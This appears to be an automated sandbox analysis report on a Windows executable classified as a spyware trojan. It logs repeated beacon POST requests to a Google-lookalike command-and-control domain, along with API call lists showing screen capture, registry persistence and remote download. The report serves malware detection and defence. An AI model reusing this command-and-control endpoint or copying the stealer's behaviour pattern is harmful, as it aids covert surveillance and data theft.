          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31 Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
          Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CCC4F0 InternetCloseHandle,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep,0_2_00CCC4F0
          Source: global trafficDNS traffic detected: DNS query: clientservices.sgoogleapis.observer
          Source: unknownHTTP traffic detected: POST /api/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: clientservices.sgoogleapis.observerContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.000000000138E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clientservices.sgoogleapis.observer/api/index.php
          Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clientservices.sgoogleapis.observer/api/index.php$$clientservices.sgoogleapis.observer
          Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clientservices.sgoogleapis.observer/api/index.php6o
          Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clientservices.sgoogleapis.observer/api/index.php8
          Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clientservices.sgoogleapis.observer/api/index.php;
          Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clientservices.sgoogleapis.observer/api/index.phpK
          Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clientservices.sgoogleapis.observer/api/index.phpk
          Source: 6uHfmjGMfL.exe, 00000000.00000002.4482159643.00000000013D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://clientservices.sgoogleapis.observer/api/index.phpserver
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CB61F0 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,0_2_00CB61F0
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CB61F00_2_00CB61F0
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CBB7000_2_00CBB700
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CF41970_2_00CF4197
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CEC82D0_2_00CEC82D
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CE2D700_2_00CE2D70
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CB4EF00_2_00CB4EF0
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CECFB90_2_00CECFB9
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CB51A00_2_00CB51A0
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CB54500_2_00CB5450
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CDB6100_2_00CDB610
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CDF82B0_2_00CDF82B
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CF1A270_2_00CF1A27
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CF5E240_2_00CF5E24
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: 0_2_00CF5F440_2_00CF5F44
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: String function: 00CD3190 appears 59 times
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: String function: 00CD9E71 appears 60 times
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: String function: 00CDA6C0 appears 56 times
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: String function: 00CD40A0 appears 136 times
          Source: C:\Users\user\Desktop\6uHfmjGMfL.exeCode function: String function: 00CB61F0 appears 34 times
          Source: 6uHfmjGMfL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
